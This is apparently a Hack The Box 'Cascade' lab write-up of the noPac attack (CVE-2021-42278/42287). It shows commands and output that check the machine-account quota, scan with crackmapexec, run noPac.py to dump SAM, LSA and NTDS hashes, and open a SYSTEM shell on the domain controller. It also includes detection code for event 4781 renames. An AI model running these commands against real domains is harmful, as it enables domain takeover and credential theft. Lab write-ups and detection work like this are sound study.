CVE-2021-42278/CVE-2021-42287
The target system might be vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain attack, given that it is relatively old and does not appear to have the patch for it installed.
By default, any domain user has the SeMachineAccountPrivilege privilege enabled. Additionally, users with that privilege can add up to 10 devices to the domain. This can be checked both locally and remotely.
*evil-winrm* ps c:\> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=cascade,DC=local
ms-ds-machineaccountquota : 10
name : cascade
objectclass : domainDNS
objectguid : 6fd34304-e0ba-4b48-92be-88e4c5926638
Notice the ms-DS-MachineAccountQuota attribute set to 10.
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ ldapsearch -x -h ldap://cascade.local:389 -D 'r.thompson@cascade.local' -w 'rY4n5eva' -b 'DC=CASCADE,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10
Through ldapsearch, it can also be checked remotely
Exploit (noPac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through a faked computer account: a newly added computer account is renamed so that its sAMAccountName matches the DC's name without the trailing $ sign, a TGT is requested under that name, and the KDC then resolves the name to the real DC when the S4U2self request is made.
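The rename step described above leaves a trace in the Security log: event 4781 ("The name of an account was changed") records the old and new sAMAccountName. The following detection logic is an added example (not part of the original write-up) that flags a machine account losing its trailing $ and, more specifically, taking a DC's name; the events and the DC inventory are constructed to mirror this box.

```python
# Added example: flag account renames that look like the noPac sAMAccountName
# spoof, using the OldTargetUserName / NewTargetUserName fields of event 4781.
from dataclasses import dataclass

# Constructed sample events (values made up to mirror the write-up: the new
# computer account is renamed to the DC name, then restored during cleanup).
SAMPLE_EVENTS = [
    {"EventID": 4781, "SubjectUserName": "r.thompson",
     "OldTargetUserName": "WIN-URI1NQCG4LR$", "NewTargetUserName": "casc-dc1"},
    {"EventID": 4781, "SubjectUserName": "r.thompson",
     "OldTargetUserName": "casc-dc1", "NewTargetUserName": "WIN-URI1NQCG4LR$"},
    {"EventID": 4781, "SubjectUserName": "helpdesk",
     "OldTargetUserName": "LAPTOP01$", "NewTargetUserName": "LAPTOP02$"},
    {"EventID": 4781, "SubjectUserName": "hr",
     "OldTargetUserName": "j.smith", "NewTargetUserName": "j.smyth"},
]

# Hypothetical inventory of DC machine accounts (assumption, not from the page).
DC_ACCOUNTS = {"CASC-DC1$"}


@dataclass
class Finding:
    subject: str
    old: str
    new: str
    reason: str


def analyse(events, dc_accounts):
    """Return one Finding per rename that matches the noPac pattern."""
    dc_names = {a.rstrip("$").lower() for a in dc_accounts}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4781:
            continue
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        if old.endswith("$") and not new.endswith("$"):
            # A computer account renamed to a non-$ name is itself suspicious...
            reason = "machine account lost its trailing $"
            # ...and becomes a near-certain noPac indicator if it is a DC's name.
            if new.lower() in dc_names:
                reason += " and now matches a DC name"
            findings.append(Finding(ev["SubjectUserName"], old, new, reason))
        elif new.endswith("$") and old.lower() in dc_names:
            # The reverse rename is the tool restoring the original name.
            findings.append(Finding(ev["SubjectUserName"], old, new,
                                    "DC-named account renamed back (cleanup)"))
    return findings
```

Setting ms-DS-MachineAccountQuota to 0 removes the precondition entirely; the check above still catches renames performed by accounts that legitimately hold the right to create computers.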
Testing
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ cme smb $IP -d cascade.LOCAL --kdcHost casc-dc1.cascade.local -u 'r.thompson' -p 'rY4n5eva' -M nopac
smb 10.10.10.182 445 casc-dc1 [*] windows 6.1 build 7601 x64 (name:CASC-DC1) (domain:cascade.LOCAL) (signing:True) (SMBv1:False)
smb 10.10.10.182 445 casc-dc1 [+] cascade.local\r.thompson:rY4n5eva
NOPAC 10.10.10.182 445 CASC-DC1 TGT with PAC size 1487
NOPAC 10.10.10.182 445 CASC-DC1 TGT without PAC size 722
NOPAC 10.10.10.182 445 CASC-DC1
NOPAC 10.10.10.182 445 CASC-DC1 VULNEABLE
nopac 10.10.10.182 445 casc-dc1 next step: https://github.com/Ridter/noPac
crackmapexec has a module available to test for the noPac exploit, as shown above. Based on that result, the target system is confirmed to be vulnerable.
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ python3 noPac.py 'cascade.local/r.thompson:rY4n5eva' --impersonate administrator -dc-ip $IP -use-ldap -dump
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target casc-dc1.cascade.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-URI1NQCG4LR$"
[*] MachineAccount "WIN-URI1NQCG4LR$" password = nUK7VMiOt!2n
[*] Successfully added machine account WIN-URI1NQCG4LR$ with password nUK7VMiOt!2n.
[*] WIN-URI1NQCG4LR$ object = CN=WIN-URI1NQCG4LR,CN=Computers,DC=cascade,DC=local
[*] WIN-URI1NQCG4LR$ sAMAccountName == casc-dc1
[*] Saving a DC's ticket in casc-dc1.ccache
[*] Reseting the machine account to WIN-URI1NQCG4LR$
[*] Restored WIN-URI1NQCG4LR$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_casc-dc1.cascade.local.ccache
[*] Attempting to del a computer with the name: WIN-URI1NQCG4LR$
[-] Delete computer WIN-URI1NQCG4LR$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Target system bootKey: 0x3c67174689c6b5a53b5e3227e338e2ad
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d256a4c6553e66da3c7872179eeb7d26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CASCADE\CASC-DC1$:aad3b435b51404eeaad3b435b51404ee:9f66aa0e27a87e63718eab2262d95409:::
[*] DefaultPassword
CASCADE\vbscrub:mario128
[*] DPAPI_SYSTEM
dpapi_machinekey:0xfde585c8ff6d34a3e4677fd263b5acc5ce275c7c
dpapi_userkey:0x31742d7265952f5e193ace0bb04758eaf0414edb
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/…/htb/labs/cascade/noPac]
└─$ python3 nopac.py 'cascade.local/r.thompson:rY4n5eva' --impersonate administrator -dc-ip $IP -use-ldap -shell
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target casc-dc1.cascade.local
[*] will try to impersonate administrator
[*] Already have user administrator ticket for target casc-dc1.cascade.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
CASC-DC1
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::4d53:4914:fd45:3fdd
link-local ipv6 address . . . . . : fe80::4d53:4914:fd45:3fdd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
System Level Compromise